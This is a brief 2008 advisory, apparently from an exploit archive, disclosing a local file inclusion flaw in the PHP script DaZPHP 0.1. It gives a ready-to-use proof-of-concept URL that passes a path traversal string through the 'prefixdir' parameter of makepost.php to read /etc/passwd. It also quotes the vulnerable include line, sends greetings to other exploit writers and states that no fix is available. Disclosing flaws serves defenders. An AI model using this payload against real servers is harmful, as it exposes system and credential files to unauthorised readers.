DaZPHP 0.1 (prefixdir) Local File Inclusion Vulnerability

2008-04-02 00:00:00

Script Name : DaZPHP

Download : http://sourceforge.net/project/showfiles.php?group_id=132192
Vul Code[Example] : http://[site]/[Path]/makepost.php?prefixdir=../../../../../../etc/passwd

Error : include "./".$prefixdir."/DaZPHPNews-0.1-1/makepost.php";
Greetz : Kezzap66345 - Str0ke - Dread 35

#

Fixes

No fixes

In order to submit a new fix you need to be registered.